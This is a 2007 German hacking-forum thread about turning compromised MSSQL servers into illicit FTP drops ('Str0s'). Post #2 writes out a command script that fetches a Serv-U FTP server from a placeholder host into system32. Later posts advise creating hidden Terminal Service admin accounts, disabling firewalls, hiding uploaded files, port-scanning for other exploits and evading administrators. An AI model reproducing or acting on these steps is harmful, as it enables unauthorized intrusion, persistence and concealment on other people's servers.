Str0 hacken?! SQL exec prob!! wichtig!!!

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von °EraZoR°, 27. Februar 2007 .

  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 27. Februar 2007
    Hiho,
    ich hab ein prob... und zwar immer wenn ich per SQLexec auf den Server geh und mein Script starten will denn kommt:
    Was heißt des??
    Der Befehl is:
    Das Script sieht so aus:
    Was mache ich falsch??
    warum kann der des Script net öffnen... das is doch im C:\

    habs auch scho mit anderen scripts probiert... einfach ma echo bla quit.... kam das selbe

    MfG
    °EraZoR°
     

  2. Anzeige
    Dealz: stark reduzierte Angebote finden.
  3. #2 27. Februar 2007
    AW: Str0 hacken?! SQL exec prob!! wichtig!!!

    bei dem script musst du nach jeder zeile (in dem fall) das hier einsetzen

    >>C:\FTP.txt

    also z.B.

    open XXX.XXX.XXX.XXX>>FTP.txt

    EDIT: ich seh grad das da noch so einige sachen fehlen...also dein script muss in deinem falle so aussehen am ende:

    Code:
    echo open XXX.XXX.XXX.XXX>>FTP.txt
    echo anonymous>>FTP.txt
    echo anonymous@lol.com>>FTP.txt
    echo BINARY>>FTP.txt
    echo get ServUDaemon.exe>>FTP.txt
    echo get ServUDaemon.ini>>FTP.txt
    echo quit>>FTP.txt
    
    Optional musst du auch deine servu ins sys32 dir machen, das machst du mit dem Befehl:

    echo lcd C:\WINDOWS\system32>>FTP.txt

    oder

    echo lcd %winroot%\system32>>FTP.txt (bin mir nicht ganz sicher, aber so in etwa dürfte das sein)

    dieser Befehl kommt vor den "get" zeilen!

    EDIT2: ich hab nochmal nachgeschaut, also wenne "set" inna cmd eingibst kommt das hier als Windows Root

    SystemRoot=C:\WINDOWS

    also musse schaun, statt %winroot%, könnte es auch %systemroot% heißen, weiß ich grade nicht...musst du probieren!

    BTW: kleiner tipp...lern ganz schnell mssql als basis und dann fang an zu sploiten, mssql wird nach sehr kurzer zeit frustrierend was die gehackten server angeht...scanstr0s ok, aber Fillstr0s..naja, nur wenn du glück hast!

    MfG
    .iNC
     
  4. #3 28. Februar 2007
    AW: Str0 hacken?! SQL exec prob!! wichtig!!!

    *hust*

    ich nehme an dass er die .txt datei ja bereits richtig erstellt hat...


    wie es ausschaut wurde dein server bereits von einem anderen erobert und der FTP Dienst ersetzt sodass er nicht mehr funktionsfähig ist.

    Du könntest es jedoch mit RCP versuchen.
     
  5. #4 28. Februar 2007
    AW: Str0 hacken?! SQL exec prob!! wichtig!!!

    Naja, das kann natürlich auch sein, aber das hätte er auch sagen müssen, aber seine aussagen wirkten recht noobig (im sinne von das du frisch dazu kommst).
    Und das script ist nunmal falsch wenn er echt das eingegeben hat.
    Also wie mein vorgänger sagte, entweder RCP oder mach nen Portscan und schau nach anderen exploits!

    MfG
    .iNC
     
  6. #5 3. März 2007
    AW: Str0 hacken?! SQL exec prob!! wichtig!!!

    Wenn FTP nicht funtz:

    Terminal Service Account erstellen -> Einloggen -> Die Daten per IE o.ä. auf den Server bringen & "verstecken" -> Deine ServU als Service starten...

    Aber wenn du logisch denken könntest, würde dir das einfallen.


    Wenn Server Firewall hat:

    Firewall in TerminalService killen->ServU neustarten


    Wenn Server Router hat:

    *****karte *g* (Es gibts noch paar möglichkeiten die ich hier nicht erwähnen will ;))

    BW wäre nice!
     
  7. #6 3. März 2007
    AW: Str0 hacken?! SQL exec prob!! wichtig!!!

    dann bist du ja bestimmt einer von den coolen, die den ts per cmd enablen können..

    denn is ts aus, dann bringt dir deine achso tolle methode gar nix..

    dem posting von daedalus kann man echt nix mehr hinzufügen.. entweder er macht es so oder er machts nicht so.. seine entscheidung..

    lol, also man sollte es können.. dan klappts auch mit den servern.. das hat nix mit glück zu tun.. schreibs dir hinter die ohren..
     
  8. #7 3. März 2007
    AW: Str0 hacken?! SQL exec prob!! wichtig!!!

    Achja Stros "hackt" man nicht, sondern wenn du sie "gehackt" hast und deinen ftp zb drauf installiert hast ist es ein Str0. Zur übertragung empfehle ich dir RCP oder HTTP, TS accounts wie Hacker:Hacker zu machen ist glaube ich nich sehr schlau. Es gibt nich nur dumme Admins. Würde es dir nich auffallen wenn plötzlich ein neuer Administrator auf deinem Server ist?? ^^
    Es sei den du machst einen unsichtbaren User. Trotzdem denke ich ist TS die unsicherste Methode und nich jeder hat den terminal service am laufen. Den zu aktivieren ist eigentlich auch sehr auffällig.
    In deinem Beispiel wurde anscheinend der FTP Service von einem anderen "Hacker" deaktiviert.
     
  9. #8 3. März 2007
    AW: Str0 hacken?! SQL exec prob!! wichtig!!!

    wat @ helloweenracer^^?
    du hast aufgehört ;o? .. wat man hier so beim durchstöbern noch alles erfährt XD
    *per icq anschreib*

    so.. nun zum thema..
    ob n anderer sploit oder nicht ist im sinne scheiss egal..
    ihr könnt euch die dienste anschauen.. ihr könnt euch tasklist anschauen.. ihr könnt n portscan machen.. ihr könnt den dienst komplett neu erstellen und/oder starten.. was wolltn ihr mehr o_O?!
     
  10. #9 3. März 2007
    AW: Str0 hacken?! SQL exec prob!! wichtig!!!

    @Halloweenracer

    Ich hab ihn nur eine der vielen Möglichkeiten beschrieben.

    B2T:
    1.Möglichkeit
    Du könntest versuchen den Rechner per "shutdown" neuzustarten. Vielleicht funktioniert es dann.

    2.Möglichkeit
    Du lässt es sein!
     
  11. #10 3. März 2007
    AW: Str0 hacken?! SQL exec prob!! wichtig!!!

    zu 1.) die ganzen bats und hast nicht gesehen, die man findet um ts zu starten, die sind alle müll, da es auch ohne nen reboot geht..

    mal davon abgesehen.. fällt ja gar nicht auf, wenn du den server rebootest..

    zu 2. ) ja, das kannst du tun

    und btw.. du hast die möglichkeit beschrieben, die schon aufgeführt wurde.. schau mal weiter oben in die liste der möglichkeiten, da stehen 2 buchstaben (TS) ..

    mfg
     

  12. Videos zum Thema
Die Seite wird geladen...
Similar Threads - Str0 hacken SQL
  1. Antworten:
    0
    Aufrufe:
    647
  2. Wie an Str0s kommen?

    Locke der Bo$$ , 8. Juli 2010 , im Forum: Filesharing
    Antworten:
    11
    Aufrufe:
    3.658
  3. Frage bzgl. Sniffen und Str0s

    enteka , 29. November 2009 , im Forum: Filesharing
    Antworten:
    6
    Aufrufe:
    860
  4. Antworten:
    2
    Aufrufe:
    803
  5. Antworten:
    11
    Aufrufe:
    895